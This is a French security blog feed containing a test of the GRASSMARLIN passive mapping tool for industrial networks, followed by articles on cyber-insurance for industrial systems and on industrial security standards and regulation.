<figure id="post-15688 media-15688" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15688 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I3-2.png" alt="" width="400" height="336" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I3-2.png 400w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I3-2-227x191.png 227w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I3-2-46x39.png 46w" sizes="auto, (max-width: 400px) 100vw, 400px" /></figure>
<div style="text-align: center;"><i><u>Figure 2 : Vue logique avec 2 automates Siemens</u></i></div>
<div style="text-align: center;"><i><u> </u></i></div>
<div style="text-align: left;">Cette topologie est générée à partir d’une capture réseau de deux équipements industriels utilisant le protocole de communication industriel S7comm. Les fichiers PCAP peuvent être  retrouvés à cette adresse : <a href="https://wiki.wireshark.org/S7comm">https://wiki.wireshark.org/S7comm</a></div>
<p>La carte principale à droite permet de donner les équipements présents, identifiés par leur adresse IP, ainsi que les communications existantes entre les équipements et les sous-réseaux IP.<br />
Par ailleurs, GRASSMARLIN reconnait à l’aide de signatures les protocoles et équipements industriels :</p>
<figure id="post-15690 media-15690" class="align-none"></figure>
<div class="separator" style="clear: both; text-align: center;"></div>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-15692 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I5-1.png" alt="" width="640" height="209" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I5-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I5-1-437x143.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I5-1-71x23.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></p>
<div style="text-align: center;"><i><u>Figure 3 : Vue logique et détails fournis par GRASSMARLIN</u></i></div>
<div style="text-align: center;"></div>
<p>Dans le cas présent, le protocole utilisé est bien reconnu comme S7comm. Le rôle des équipements dans les communications est aussi informé : le master (ou maître) donne les consignes lorsque le slave (ou esclave) exécute les commandes. Le Vendor Name (nom du constructeur) est donné et permet aux gestionnaires de parcs industriels de pouvoir se repérer plus aisément. Enfin, dans le cas où les adresses IP sont publiques (ce qui n’est pas le cas ici) le pays d’origine de l’équipement est informé.<br />
Ces informations sont générées suite à la confrontation des captures réseaux avec les signatures connues par GRASSMARLIN, l’attribut Confidence (confiance) échelonné de 1 (non confiant) à 5 (confiant) informe alors sur le degré de véracité des informations données.<br />
GRASSMARLIN fournit aussi une vision textuelle de la carte à l’aide d’un arbre de connections (présent à gauche sur la figure 2) renseignant les équipements par sous-réseaux.<br />
Il est aussi possible d’isoler les communications liées à un équipement en particulier et d’obtenir des premiers éléments d’analyses tels que : la taille des paquets échangés, l’instant t de l’échange, l’origine du paquet (si plusieurs fichiers PCAP’s sont utilisés) :</p>
<div class="separator" style="clear: both; text-align: center;"></div>
<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: center;"><img loading="lazy" decoding="async" class="aligncenter wp-image-15694 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I6-1.png" alt="" width="320" height="198" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I6-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I6-1-309x191.png 309w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I6-1-63x39.png 63w" sizes="auto, (max-width: 320px) 100vw, 320px" /></div>
<div style="text-align: center;"><i><u>Figure 4 : Fenêtre d’analyse des communications d’un automate</u></i></div>
<div style="text-align: center;"></div>
<h3>Signatures protocolaires</h3>
<p>GRASSMARLIN embarque des signatures permettant de reconnaitre les protocoles utilisés sur la vue logique.<br />
Chaque signature peut être composée de deux types d’élément :</p>
<ul>
<li>L’élément Filter (ou filtre) qui décrit un attribut à détecter.</li>
<li>L’élément Payload (ou charge utile) qui permet de retourner des informations à l’utilisateur.</li>
</ul>
<p>Une signature peut contenir plusieurs Filter et chaque Payload fait référence à un Filter :</p>
<div class="separator" style="clear: both; text-align: center;"></div>
<p>&nbsp;</p>
<div style="text-align: center;">
<figure id="post-15696 media-15696" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15696 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I7-1.png" alt="" width="320" height="289" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I7-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I7-1-211x191.png 211w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I7-1-43x39.png 43w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<p><i><u>Figure 5 : Exemple de signature MODBUS</u></i></p>
</div>
<div style="text-align: center;"></div>
<p>Les Filter permettent essentiellement de décrire des attributs protocolaires des couches 2 à 4 du modèle OSI. Voici une liste des Filter actuellement disponibles :</p>
<figure id="post-15698 media-15698" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15698 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I8.png" alt="" width="400" height="179" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I8.png 400w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I8-71x32.png 71w" sizes="auto, (max-width: 400px) 100vw, 400px" /></figure>
<div style="text-align: center;"><i><u>Tableau 1 : Ensemble des filtres possibles</u></i></div>
<div style="text-align: center;"></div>
<p>Les Payload quant à eux permettent de rajouter une description à un élément réseau, d’extraire des valeurs d’un paquet ou encore d’afficher une information en fonction de la présence d’un motif dans un paquet.<br />
La version actuelle de GRASSMARLIN (v3) compte 54 signatures couvrant les protocoles industriels couramment utilisés. Du fait du récent passage de l’outil en open-source (28/01/16) il est probable que la bibliothèque de signature s’enrichisse avec les années à venir.<br />
Les signatures sont éditées sous le format XML néanmoins un outil graphique est proposé – FingerPrint Editor &#8211; afin de permettre une création plus aisée de signatures :</p>
<figure id="post-15700 media-15700" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15700 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1.png" alt="" width="400" height="308" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1.png 400w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1-248x191.png 248w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1-51x39.png 51w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1-156x121.png 156w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1-155x120.png 155w" sizes="auto, (max-width: 400px) 100vw, 400px" /></figure>
<div style="text-align: center;"><i><u>Figure 6 : Fingerprint Editor, outil graphique d’édition de signatures</u></i></div>
<div style="text-align: center;"></div>
<h3>Vue physique</h3>
<p>La topologie physique permet d’obtenir les connexions physiques existantes entre les équipements.</p>
<figure id="post-15702 media-15702" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15702 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I10-1.png" alt="" width="640" height="330" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I10-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I10-1-370x191.png 370w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I10-1-71x37.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div style="text-align: center;"><i><u>Figure 7 : Vue physique</u></i></div>
<div style="text-align: center;"></div>
<p>Ces vues, plus orientées connectivité réseau, permettent d’obtenir les liaisons physiques existantes entre les équipements industriels et leurs connexions aux équipements réseaux.<br />
À ce jour seul les routeurs Cisco sont supportés et les vues sont générées à partir des résultats des 3 commandes suivantes :</p>
<ul>
<li>“show running-config”</li>
<li>“show ip arp” (OU) “show mac address-table”</li>
<li>“show interfaces”</li>
</ul>
<p>Une fois la sortie de ces commandes enregistrée dans un fichier texte, GRASSMARLIN est en mesure de générer à partir de ce dernier la vue physique.</p>
<h3>Partage de données</h3>
<p>L’exportation des données est gérée par GRASSMARLIN avec 3 types d’export</p>
<ul>
<li>L’exportation des vues sous format d’images (PNG).</li>
<li>L’exportation des données sous format XML :
<ul>
<li>Enregistre l’ensemble de l’arbre de connexion de la vue logique.</li>
<li>Ces données peuvent être utilisées comme des données de session lors de prochaine importation.</li>
</ul>
</li>
<li>L’exportation des données en partage : création d’une archive avec les données sous format XML et les fichiers de captures réseaux générés.</li>
</ul>
<h2>Tests sur banc d’essai</h2>
<p>Des tests sur une des maquettes SI industriel de Solucom ont été réalisés afin de confronter l’outil à un cas d’utilisation concret avec de réels équipements industriels.</p>
<h3>Présentation banc d’essai</h3>
<p>Le banc d’essai simule un aiguillage de train et est composé de :</p>
<ul>
<li>1 interface homme/machine (IHM) Siemens ;</li>
<li>1 automate Siemens ;</li>
<li>2 automates Schneider ;</li>
<li>1 switch manageable.</li>
</ul>
<figure id="post-15704 media-15704" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15704 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I11.jpg" alt="" width="320" height="239" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I11.jpg 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I11-256x191.jpg 256w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I11-52x39.jpg 52w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div style="text-align: center;"><i><u>Figure 8 : Photo du banc d’essai</u></i></div>
<div style="text-align: center;"></div>
<p>Un poste de travail disposant de Grassmarlin est directement connecté à un port en mirroring sur le switch et accède donc à l’ensemble des communications de la maquette. Par ailleurs, aucun équipement Cisco n’étant présent sur la maquette seule la vue logique a été testée.</p>
<h3>Réalisation des tests</h3>
<p>Suite à une capture en temps réel des trames, GRASSMARLIN a pu générer la vue logique suivante :</p>
<figure id="post-15706 media-15706" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15706 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I12-1.png" alt="" width="320" height="281" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I12-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I12-1-218x191.png 218w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I12-1-44x39.png 44w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: center;"><i><u>Figure 9 : Vue logique de la maquette</u></i></div>
<div style="text-align: center;"></div>
<div style="text-align: left;">Et, après réorganisation (manuelle) de la vue nous obtenons la vue suivante :</div>
<p>&nbsp;</p>
<figure id="post-15708 media-15708" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15708 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I13-1.png" alt="" width="320" height="169" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I13-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I13-1-71x37.png 71w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div style="text-align: center;"><i><u>Figure 10 : Vue logique de la maquette réordonnée</u></i></div>
<div style="text-align: center;"></div>
<p>Le temps d’apparition des équipements sur la carte est quasi-instantané dès réception des flux. GRASSMARLIN identifie bien l’ensemble des équipements présents tout en donnant les protocoles de communications utilisés.<br />
De même, un fichier XML de sortie est correctement généré à partir des fonctions d’export. Ce dernier résume l’ensemble des informations extraites par GRASSMARLIN et permet de réutiliser les données plus facilement :</p>
<p>&nbsp;</p>
<figure id="post-15710 media-15710" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15710 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I14-1.png" alt="" width="640" height="406" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I14-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I14-1-301x191.png 301w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I14-1-61x39.png 61w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div style="text-align: center;"><i><u>Figure 11 : Fichier de sortie XML</u></i></div>
<div style="text-align: center;"></div>
<p>Cependant, certaines limitations ont pu être observées :</p>
<ul>
<li>La non-concurrence des signatures<br />
Si un équipement répond à plusieurs signatures alors seule une signature est détectée. Ceci peut notamment poser problème dans le cas d’une IHM qui communique potentiellement avec différents automates en utilisant plusieurs protocoles de communication.</li>
<li>Le manque de verbosité de certaines signatures<br />
Les signatures comportent des champs descriptions dans leur Payload permettant de décrire au mieux le rôle de l’équipement identifié. Il est possible que ces champs soient laissés initialement vides ou peu renseignés ce qui peut compliquer la tâche d’identification.</li>
<li>Une analyse des échanges peu aboutie<br />
GRASSMARLIN ne fournit actuellement que les premiers éléments d’analyse sur les communications : tailles des paquets, instants d’envois. Dans les pistes d’améliorations de sa fonction d’analyse nous pourrions par exemple citer l’implémentation d’une fonction de reconnaissance de cycles dans les échanges entre IHM et automates.</li>
</ul>
<h2>Conclusion</h2>
<p>D’autres outils de détection passive de topologie sont disponibles sur le marché. Cependant GRASSMARLIN est actuellement l’un des rares, si ce n’est l’unique, à être destiné au SI industriels et à être Open-Source.<br />
En comparaison un autre outil nommé <a href="http://www.netresec.com/?page=NetworkMiner" target="_blank" rel="noopener">NetworkMiner</a> permet aussi de réaliser des topologies de réseaux en utilisant les signatures d’autres outils dont notamment : <a href="https://nmap.org/" target="_blank" rel="noopener">nmap</a>, <a href="http://lcamtuf.coredump.cx/p0f3/" target="_blank" rel="noopener">p0f</a> et <a href="https://ettercap.github.io/ettercap/" target="_blank" rel="noopener">Ettercap</a> . Néanmoins, ce dernier n’embarque pas à l’installation de signatures destinées aux protocoles industriels et n’est donc pas aussi précis que GRASSMARLIN.</p>
<figure id="post-15712 media-15712" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15712 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I15-1.png" alt="" width="320" height="268" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I15-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I15-1-228x191.png 228w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I15-1-47x39.png 47w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div style="text-align: center;"><i><u>Figure 12 : Sortie de l’outil NetworkMiner pour 2 automates Siemens</u></i></div>
<div style="text-align: center;"></div>
<p>&nbsp;</p>
<figure id="post-15714 media-15714" class="align-none"><img loading="lazy" decoding="async" class="wp-image-15714 size-full aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I16-1.png" alt="" width="320" height="287" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I16-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I16-1-213x191.png 213w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I16-1-43x39.png 43w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div style="text-align: center;"><i><u>Figure 13 : Autre exemple – utilisation de l’outil p0f avec 2 automates Siemens</u></i></div>
<div style="text-align: center;"></div>
<div></div>
<figure id="post-15716 media-15716" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15716 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I17-1.png" alt="" width="640" height="209" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I17-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I17-1-437x143.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I17-1-71x23.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div style="text-align: center;"><i><u>Figure 14 : Sortie de GRASSMARLIN avec 2 automates Siemens</u></i></div>
<div style="text-align: center;"></div>
<p>Citons également la solution commerciale de Sentryo, dédiée elle aux SI industriels. Cette solution ne se contente pas de créer une cartographie à l’instant t, mais permet également d’alerter sur toutes variations par rapports aux communications habituelles, et ainsi de détecter des événements de sécurité. Lors de la démonstration à laquelle nous avons assistée, le niveau de détail fourni sur les automates (Schneider et Siemens à minima) était bien supérieur à celui qu’on peut actuellement obtenir avec Grassmarlin (marque, modèle, composants de l’automate et version du firmware par exemple).</p>
<figure id="post-15718 media-15718" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15718 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I18-1.png" alt="" width="640" height="240" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I18-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I18-1-437x164.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I18-1-71x27.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: center;"><i><u>Figure 15 : Extrait d’une cartographie générée par Sentryo (<a href="https://www.sentryo.net/how-to-start-your-ics-cybersecurity-project/">https://www.sentryo.net/how-to-start-your-ics-cybersecurity-project/</a>)</u></i></div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2016/03/test-de-grassmarlin-outil-open-source/">Test de Grassmarlin, outil open-source de cartographie passive pour SI industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Assurer son système d’information industriel contre une cyberattaque, c’est possible ?</title>
		<link>https://www.riskinsight-wavestone.com/2015/12/assurer-son-systeme-dinformation-industriel-contre-une-cyberattaque-cest-possible/</link>
		
		<dc:creator><![CDATA[Martin Descazeaux]]></dc:creator>
		<pubDate>Wed, 16 Dec 2015 09:03:37 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[cyberassurance]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[protection]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=8621</guid>

					<description><![CDATA[<p>Les cyberattaques récentes nous ont rappelé que des attaques sur les systèmes d’information peuvent avoir des impacts matériels, voire humains, avec des conséquences financières très importantes. Les attaques sur les systèmes d’information (SI) industriels en sont les exemples parfaits : une...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/12/assurer-son-systeme-dinformation-industriel-contre-une-cyberattaque-cest-possible/">Assurer son système d’information industriel contre une cyberattaque, c’est possible ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>Les cyberattaques récentes nous ont rappelé que des attaques sur les systèmes d’information peuvent avoir des impacts matériels, voire humains, avec des conséquences financières très importantes. Les attaques sur les systèmes d’information (SI) industriels en sont les exemples parfaits : une compromission logique du SI industriel peut entrainer le dérèglement et/ou la destruction du matériel industriel associé, et avoir des conséquences désastreuses en fonction des activités de l’entreprise. Face à ces impacts financiers critiques, la question de l’assurabilité de ce risque se pose alors. Mais le marché de l’assurance est-il aujourd’hui capable de proposer des solutions satisfaisantes ? Que proposent les assurances traditionnelles (Dommages, Tous Risques Informatiques, Responsabilité Civile…) ? La cyberassurance peut-elle répondre à cette problématique ?</em></p>
<h2>Pourquoi assurer son SI industriel ?</h2>
<p>On définit les systèmes d’information industriels comme des systèmes « logiques » permettant de piloter des outils de production « physiques » (chaînes de montage, machines-outils, fours, scanners médicaux, climatisations, aiguillages, pipelines…). De plus en plus ouverts, ils se positionnent comme un intermédiaire entre le système d’information « classique » de l’entreprise, et sa chaine de production physique.</p>
<p>De par son positionnement clé pour l’entreprise, la sensibilité des données et systèmes qu’il manipule et son ouverture accrue sur le SI de l’entreprise (voire parfois sur internet), le SI industriel devient de plus en plus souvent la cible d’attaques aux motivations différentes (destruction, espionnage, gain financier…). Les récentes attaques révélées en Allemagne par le BSI avec la <a href="http://www.lemagit.fr/actualites/2240237195/Un-industriel-allemand-victime-dune-attaque-de-type-Stuxnet">compromission du système de contrôle du haut fourneau</a> ou en Corée du Sud avec <a href="http://www.securityweek.com/south-korea-accuses-north-cyber-attacks-nuclear-plants">le vol de données sur les réacteurs nucléaires</a> ne font que confirmer la probabilité d’attaques de ces systèmes.</p>
<p>En plus des dommages matériels (destruction de ses outils de production) et immatériels (frais de reconstruction des données, frais d’expertise…) pour l’entreprise, les conséquences de ces attaques peuvent être considérables et dépasser le cadre même de l’entreprise : fuite radioactive, déraillement d’un train…</p>
<p>Face à ce risque majeur, et l’impossibilité à la fois d’empêcher la totalité des attaques et d’absorber l’ensemble des impacts, le besoin d’assurabilité de ces systèmes se fait ressentir.</p>
<h2>Les assurances traditionnelles ne répondent pas au besoin</h2>
<p>Les assurances traditionnelles, et notamment les assurances « Dommages », peuvent répondre à certains risques liés aux SI industriels. Elles permettent notamment de couvrir les dommages matériels liés à une panne informatique, ou à un incendie. De même, les polices « Responsabilité Civile » peuvent couvrir les dommages aux tiers suite à un incident sur le SI industriel.</p>
<p>Pour autant ces contrats traditionnels trouvent parfois leurs limites dans un contexte cyber.</p>
<p>En effet, ces assurances couvrent très rarement les dommages immatériels, quel que soit le scénario de sinistre, et encore moins si le scénario est une cyberattaque. De fait, les frais de reconstitution des données et d’expertise technique (par exemple pour les investigations numériques suite à une attaque) sont rarement couverts par ces assurances.</p>
<p>De plus, la plupart de ces contrats ont des exclusions liées la cause du sinistre et excluent les cyberattaques. Il est parfois possible de « racheter » ces exclusions moyennant une hausse de la prime annuelle, mais ce n’est pas toujours le cas et la couverture se limite quasiment toujours aux dommages matériels.</p>
<h2>La cyberassurance est-elle la solution ?</h2>
<p>Se présentant comme l’assurance des risques cyber, on pourrait naturellement imaginer qu’elle couvre complètement les besoins d’assurance des SI industriels relatifs au risque de cyberattaque. Malheureusement, il n’en est rien : si certains contrats commencent à proposer des solutions couvrant la particularité logique/physique des SI industriels, la plupart n’y répond que partiellement.</p>
<p>Le premier frein à la couverture totale est le fait que la cyberassurance couvre majoritairement les dommages immatériels, puisque destinée principalement aux systèmes d’information « classiques ». En effet, l’impact naturel associé à une cyberattaque est une atteinte aux données, et non au matériel. Avec cette approche, de nombreux frais sont couverts : frais de reconstruction des données, frais d’expertise, frais de notification, frais de justice…. Pour autant, l’ensemble des dommages matériels, et notamment sur les systèmes physiques industriels détruits, ne sont pratiquement jamais couverts, ce qui entraine un manque notable dans la couverture du risque pour un SI industriel, et peut ainsi freiner la souscription d’une cyberassurance.</p>
<p>Par ailleurs, au vu des impacts importants liés aux SI industriels qui peuvent dépasser le cadre même de l’entreprise, certains assureurs excluent directement dans leur police la couverture de l’ensemble des frais liés à ces systèmes, qu’ils soient immatériels ou matériels. Le risque n’est alors pas (ou peu) couvert.</p>
<h2>Une évolution en vue ?</h2>
<p>Cependant, avec la demande croissante des acteurs de l’industrie, les cyberassureurs commencent à intégrer la couverture des dommages matériels (voire humains) à leur police. Pour autant, il est à noter que des sous-limites (limitation de garantie pour certains frais) contraignantes y sont souvent associées, ce qui peut parfois en limiter considérablement l’intérêt. Cependant, dans un marché fortement concurrentiel et compte tenu des impacts associés, cet argument peut rapidement apparaitre comme différenciateur.</p>
<p>&nbsp;</p>
<p>Il existe un « vide » dans la couverture assurantielle des risques cyber pour les systèmes d’information industriels. Les assurances traditionnelles montrent un certain nombre de limites en excluant souvent les scénarios cyber, et a contrario les cyberassurances couvrent rarement les dommages matériels, pourtant centre de coût clé des SI industriels. Pour autant, les cyberassurances commencent à proposer des solutions avec une couverture plus globale incluant les dommages matériels. Mais la demande doit continuer d’augmenter et le marché se démocratiser pour atteindre une couverture optimale des SI industriels. Pour 2016 ?</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/12/assurer-son-systeme-dinformation-industriel-contre-une-cyberattaque-cest-possible/">Assurer son système d’information industriel contre une cyberattaque, c’est possible ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Normes, standards et réglementations : de réels leviers pour la sécurisation des SI Industriels ?</title>
		<link>https://www.riskinsight-wavestone.com/2015/04/normes-standards-et-reglementations-de-reels-leviers-pour-la-securisation-des-si-industriels/</link>
		
		<dc:creator><![CDATA[Anthony di Prima]]></dc:creator>
		<pubDate>Tue, 28 Apr 2015 07:30:02 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Manufacturing & Industry 4.0]]></category>
		<category><![CDATA[manuf & industry 4.0]]></category>
		<category><![CDATA[norme]]></category>
		<category><![CDATA[Règlementation]]></category>
		<category><![CDATA[SI industriel]]></category>
		<category><![CDATA[standardisation]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=7332</guid>

					<description><![CDATA[<p>La sécurité des Systèmes d’Information Industriels (SII) n’est pas un problème nouveau et diverses initiatives, provenant d’agences gouvernementales, d’organismes de standardisation ou d’organisations sectorielles, ont eu pour objectif d’établir des documents de référence en la matière. Une multitude de textes...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/04/normes-standards-et-reglementations-de-reels-leviers-pour-la-securisation-des-si-industriels/">Normes, standards et réglementations : de réels leviers pour la sécurisation des SI Industriels ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>La sécurité des Systèmes d’Information Industriels (SII) n’est pas un problème nouveau et diverses initiatives, provenant d’agences gouvernementales, d’organismes de standardisation ou d’organisations sectorielles, ont eu pour objectif d’établir des documents de référence en la matière.</em></p>
<h2>Une multitude de textes</h2>
<p>La liste est longue, c’est pourquoi il conviendra de s’appuyer sur le (ou les) référentiel(s) le(s) plus adapté(s) : secteur, niveau de criticité de son installation. À ce titre, le <a href="http://www.clusif.asso.fr/" target="_blank" rel="noopener noreferrer">CLUSIF</a>, par l’intermédiaire du groupe de travail sur la sécurité des systèmes industriels, animé notamment par Solucom, a publié un panorama des référentiels en la matière. Pas moins d’une cinquantaine de documents ont été analysés et des fiches de lecture permettent d’en avoir une vision synthétique. Les documents ont été répertoriés et catégorisés : des plus introductifs aux plus exhaustifs, allant de quelques pages à plus d’un millier, le guide du CLUSIF précise à quels lecteurs ils sont le plus adaptés (filières SSI ou SII, concepteur/intégrateur/mainteneur).</p>
<p>Les objectifs de ces référentiels sont multiples. Ils peuvent être utilisés comme un véritable outil pour réaliser des audits de sites, définir sa stratégie et les actions associées ou plus simplement évaluer son degré d’alignement et de conformité au standard retenu. De tous, l’IEC 62443 est sans doute le référentiel le plus connu du milieu et propose de nombreux guides qui tentent d’adresser l’ensemble des pans de la sécurité de ces SI. L’ISO a également apporté sa pierre à l’édifice avec la récente norme ISO 27019.</p>
<p>Les États publient également des guides nationaux. Au Royaume-Uni, le <a href="http://www.cpni.gov.uk/" target="_blank" rel="noopener noreferrer">CPNI</a> (Center for the Protection of National Infrastructure) propose plusieurs guides thématiques autour de la sécurité des SI industriels. Aux États-Unis, plusieurs entités (DHS, DoE…) ont élaboré des guides sectoriels. Enfin en France, l’ANSSI a également publié ses propres guides.</p>
<p>Certains secteurs ont apporté une réponse propre à leurs spécificités respectives comme l’AIEA qui propose son guide pour les installations nucléaires ou encore le NERC CIP qui oblige les différents opérateurs électriques à être conformes à ses standards.</p>
<h2>La réglementation : arme d’amélioration massive de la sécurité ?</h2>
<p>Cette abondance de littérature montre qu’il n’y a pas de réel consensus en la matière aujourd’hui. De plus, l’application des bonnes pratiques édictées dans ces documents ne reste finalement qu’un acte de volontariat de la part des entités concernées. Comme cela est souvent le cas, l’adoption de pratiques généralisées passe par la mise en place d’une réglementation (SEVESO par exemple). Et c’est bien ce qu’envisage l’État français au travers de la LPM (<a href="http://www.senat.fr/dossier-legislatif/pjl12-822.html" target="_blank" rel="noopener noreferrer">Loi de Programmation Militaire</a>) : rendre obligatoire l’adoption de certaines mesures de cybersécurité pour les OIV.</p>
<p>Mais ces avancées françaises ne doivent pas faire oublier la nécessité d’une approche plus globale, a minima européenne. En effet, au-delà des mesures organisationnelles et techniques, La LPM prévoit également le recours à des produits labellisés. Il ne s’agit là que d’un schéma franco-français. Les efforts requis pour obtenir cette labélisation peuvent apparaître comme un frein pour des constructeurs/éditeurs à portée internationale. Avoir une reconnaissance européenne ou internationale de la sécurité de leur produit est donc un élément déterminant et qui aboutira à un réel retour sur investissement.</p>
<p>Dans ce domaine, des directives européennes sont également attendues, en particulier celle dédiée à la sécurité des réseaux et des infrastructures (NIS). Elles légitimeront davantage les initiatives sur le territoire français. L’ENISA a d’ailleurs publié les bases d’un schéma de certification de la sécurité des Smart Grid à portée européenne. Avec une approche progressive, ce que tend à faire l’État français, la réglementation obtiendra l’adhésion des industriels. La tendance va vers une adaptation des mesures avec une personnalisation opérateur par opérateur sans pour autant s’éloigner d’une cible ambitieuse. La publication prochaine des décrets d’application, puis des arrêtés de la LPM, permettra de le vérifier.</p>
<p>Enfin, pour ceux qui ne sont pas immédiatement concernés en tant qu’opérateur critique, nul doute qu’ils bénéficieront de l’élan global de ces démarches et pourront bien évidement s’en inspirer en complément des guides, normes et standards déjà existants.</p>
